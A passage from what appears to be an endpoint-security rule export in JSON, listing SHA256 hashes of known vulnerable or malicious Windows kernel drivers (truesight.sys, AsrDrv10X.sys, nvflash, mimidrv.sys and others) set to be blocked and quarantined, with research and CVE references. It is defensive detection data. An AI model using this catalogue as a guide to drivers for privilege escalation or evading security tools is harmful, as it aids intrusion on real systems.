"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810362Z", + "creation_date": "2026-03-23T11:45:31.810364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "087c53edab3309eb60f7663438c24b515818de19702a53bf0e9cf445f12133fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c0f29bd-c90e-5122-abc2-1799dba648b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455556Z", + "creation_date": "2026-03-23T11:45:30.455559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "76af3f9fa111d694e37058606f2636430bdd378c85b94f426fbfcd6666ebe6cc", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c12a4d2-4f80-540d-aec2-20987bd9183e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824331Z", + "creation_date": "2026-03-23T11:45:30.824334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df276afe1f65f0705c18cf52d37f32e4a3f1ea9ff36fa5fe6012b687da2bebe1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c1398a6-613f-5df0-891c-0507517974a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499538Z", + "creation_date": "2026-03-23T11:45:31.499541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47f7c0b0212d3e5d881d821ab0697aa9beb29da8c67d6d513b51329594063b1c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c145121-9f67-5acd-81bb-f0c02d58b07a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984122Z", + "creation_date": "2026-03-23T11:45:29.984124Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8aba8df5a1aa3f14551047c8c9dea2b2d5867f2ad4dec89b53530c96a13c84db", + "comment": "Vulnerable Kernel Driver (aka CupFixerx64.sys) 
[https://www.loldrivers.io/drivers/c98af16e-197f-4e66-bf94-14646bde32dd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c151a64-55ea-5ea3-a72a-55293b1aefd5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467590Z", + "creation_date": "2026-03-23T11:45:30.467593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "028011ae3cd1d972b7c46fc8261f583d1fe5dedcef02ee63ee532b3668bfdc25", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c17e236-a3b6-580e-97db-61400a65850c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613563Z", + "creation_date": "2026-03-23T11:45:29.613565Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac7b3c3b74e6e282c7f50c17a6213b81b181f779cd7c0c78e3cb426c427a98db", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c319db3-903c-5dfd-9650-924206544b1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814494Z", + "creation_date": "2026-03-23T11:45:31.814497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "530cdaa6c56ba94938ea82a4a2e91b8dfcd5a7a1faac320600cc9f43adf10b3f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c4f5941-bb5e-5617-9618-a728eb262939", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816865Z", + "creation_date": "2026-03-23T11:45:30.816867Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816886Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05c15a75d183301382a082f6d76bf3ab4c520bf158abca4433d9881134461686", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c5202dd-ebad-56d6-8a6b-e46afc303089", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477581Z", + "creation_date": "2026-03-23T11:45:31.477584Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d160f1e1eb14430974e27e865d58ef410d987a1142409f24f7dfb6bb61ebe03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c630abb-6e00-5531-a584-7e661688169e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490138Z", + "creation_date": "2026-03-23T11:45:31.490140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1bc1c957ed632fd4e19c3f39f1e3e73fc9f34e363077329fceaecb36892c6ce3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c6ed26d-3e6b-5f4f-9a34-1cb50f6b1912", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489501Z", + "creation_date": "2026-03-23T11:45:31.489504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbcaf228879ba5effe4b49da888e0cf197bcfbce92ecd297c5f756353fd29f40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c87dc52-db4a-5193-a8fe-8c5af28185cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154519Z", + "creation_date": "2026-03-23T11:45:31.154521Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154526Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2b1e51eaf700909df86108f021961970ec24721b66d3248f64be7f15fc9482f", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c8d35fd-cc3f-5564-947f-73cef799bb13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481615Z", + "creation_date": "2026-03-23T11:45:31.481619Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481628Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1ebac06f8f63c3afd1428849b68ca03567b14fddf79f4cb91561b51a89c025b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3c8daf89-46c4-542d-b6ce-097fa65b32c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828842Z", + "creation_date": "2026-03-23T11:45:30.828844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c0744d29a4d956fd34a41e804fe486250ecac8da878fc110ef219d6bcbf294c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ca41381-7c6d-5b18-9901-76b7c1122871", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825335Z", + "creation_date": "2026-03-23T11:45:31.825339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95557ce0e6600ff4883577ff18c58379f1276db52aed9af01a6588131e3a5167", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cabdaf0-8fea-5866-b62f-b75bcaedc76b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980254Z", + "creation_date": "2026-03-23T11:45:29.980256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0507d893e3fd2917c81c1dc13ccb22ae5402ab6ca9fb8d89485010838050d08d", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cb25458-98d1-5b57-9128-f763d166c1e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817286Z", + "creation_date": "2026-03-23T11:45:30.817288Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6fcb7131bc940fc01dc5444a1ae18bf299e92c3155a783629007cf2a61cda9db", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cbcc79e-794a-5b98-856a-1617552d40b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140294Z", + "creation_date": "2026-03-23T11:45:31.140297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140305Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c712475ca6730e1c1251e30cc137391fae733cc316bb4e09dc9d8cc0943b285", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cc47fbe-2ec2-515f-94fc-36e53e2a8cc9", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618497Z", + "creation_date": "2026-03-23T11:45:29.618499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618504Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "372c6118541efaa800bcba6e0c1780f9beb8cab6f2176bcc5fe3664ea19379e4", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cd0e340-f49f-587b-89a8-687ad19416ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617989Z", + "creation_date": "2026-03-23T11:45:29.617991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.617996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b2ad08123e8ed2516548240cfcdf5eefd89293f31070a6cd3949ee1b66fed14", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3cd6bd37-264c-5f89-80ad-25bb294db2fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821672Z", + "creation_date": "2026-03-23T11:45:31.821674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ce73093c56112af457da031aae34076a633184258a0a0957e28fbb0e7791c6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ce5f9c5-527d-54b3-aec2-cd4ede2f5e37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813374Z", + "creation_date": "2026-03-23T11:45:31.813377Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa2848cf2cd9f9b241c73ba092460777573828c50eaafed6983f1c5d62edba84", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ceb8874-4fc4-51f5-9255-3f75fedb782b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981890Z", + "creation_date": "2026-03-23T11:45:29.981892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981898Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "129fa1795cffca9973f59df59f880a9f2bdb3aa9873363f8e2f598ccc6e32542", + "comment": "Vulnerable Kernel Driver (aka DirectIo.sys) [https://www.loldrivers.io/drivers/ce2d41fd-908f-414c-b6b5-338298f425b8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ceba656-7adf-5d40-8f6b-b98757cf91bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147077Z", + "creation_date": "2026-03-23T11:45:31.147079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 